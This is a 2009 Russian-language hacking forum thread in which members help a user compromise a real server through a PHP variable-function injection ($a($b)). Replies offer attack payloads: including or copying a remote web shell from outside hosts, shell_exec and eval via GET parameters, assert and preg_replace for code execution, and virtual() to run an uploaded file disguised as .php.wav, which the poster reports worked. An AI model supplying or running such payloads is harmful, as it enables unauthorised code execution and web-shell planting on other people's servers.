взлом 1 функцией

Discussion in 'Уязвимости' started by wix, 2 Feb 2009.

  1. wix

    wix Member

    Joined:
    23 May 2007
    Messages:
    18
    Likes Received:
    5
    Reputations:
    0
    точнее взлом с помощью 2 переменных)
    возможно ли?)

    PHP:
    $lol=$a($b);
    соответственно $a и $b можно подставить свои

    system,exec не катят)

    readfile работает,но толку от чтения файлов нет)
     
  2. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    $a=include
    $b='http://oneline.ucoz.ru/madshell.php'
     
  3. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Это не функция, а языковая конструкция
    PHP:
    $a = array('include''require''eval');
    var_dump(array_map('function_exists'$a));
    ps: вопрос весьма интересный, перерываю php.net :)

    UPD:
    первая идея. Ограничения: должен быть установлен коннект к базе и у пользователя бд должны быть File priv
    Функция - mysql_query, параметр
     
    #3 oRb, 2 Feb 2009
    Last edited: 2 Feb 2009
    1 person likes this.
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    ?a=shell_exec&b=you command
    шелл, но без вывода.
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    copy("http://xaker.ru/shell.txt", "shell.php");
    eval($_GET[id]);

    вариантов масса
     
  6. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
    copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее
     
  7. wix

    wix Member

    Joined:
    23 May 2007
    Messages:
    18
    Likes Received:
    5
    Reputations:
    0
    благодаря

    PHP:
    $a=phpinfo;
    $b=-1;
    выяснилось что на серве safe mode - ON )

    потому все "вкусные" функции не пашут)
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    А так ?


    site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]

    не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)
     
    #8 попугай, 3 Feb 2009
    Last edited: 3 Feb 2009
  9. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Ты хоть пробовал?
    ubuntu LAMP
    В том и фишка, если бы все было так просто) ...
     
    #9 BlackSun, 3 Feb 2009
    Last edited: 3 Feb 2009
  10. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    уже давно пора забить на всякие *exec - туфта все

    assert и все дела ) это если один аргумент $b, если можно два - то ченить с коллбеком, если три - то preg_replace.
     
    #10 ShAnKaR, 3 Feb 2009
    Last edited: 4 Feb 2009
    1 person likes this.
  11. wix

    wix Member

    Joined:
    23 May 2007
    Messages:
    18
    Likes Received:
    5
    Reputations:
    0
    вообщем помогла
    virtual() :)

    причем инклюд лоальных файлов file.wav не канал ,а вот file.php.wav заработал)))


    п.с. : интересная функция ассерт ) бум знать на будущее)))))
     
  12. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    если сработала virtual(), то можно было с таким же успехом просто напрямую обратится к твоему file.php.wav.